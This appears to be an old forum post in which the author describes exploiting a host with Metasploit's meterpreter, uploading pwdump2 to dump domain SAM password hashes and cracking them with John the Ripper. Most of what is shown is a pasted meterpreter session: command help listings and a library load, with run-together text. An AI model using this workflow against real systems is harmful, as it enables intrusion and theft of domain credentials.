Here you go been fooling around with the metasploit meterpreter and used it to exploit a host, upload pwdump2, execute the program sucessfully to dump the SAM hases for the domain and then fire up john to crack the hashes. enjoy...

Core Core feature set commands------------ ----------------read Reads from a communication channelwrite Writes to a communication channelclose Closes a communication channelinteract Switch to interactive mode with a channelhelp Displays the list of all register commandsexit Exits the clientinitcrypt Initializes the cryptographic subsystem

-m <mod> The names of one or more modules to load (e.g. 'net').-p <path> The path to load the modules from locally.-d Load the library from disk, do not upload it.meterpreter> use -m Fsloadlib: Loading library from 'ext680723.dll' on the remote machine.meterpreter>loadlib: success.meterpreter> help

Core Core feature set commands------------ ----------------read Reads from a communication channelwrite Writes to a communication channelclose Closes a communication channelinteract Switch to interactive mode with a channelhelp Displays the list of all register commandsexit Exits the clientinitcrypt Initializes the cryptographic subsystem

File System File system interaction and manipulation commands------------ ----------------cd Change working directory.getcwd Get the current working directory.ls List the contents of a directory.upload Upload one or more files to a remote directory.download Download one or more files from a remote directory.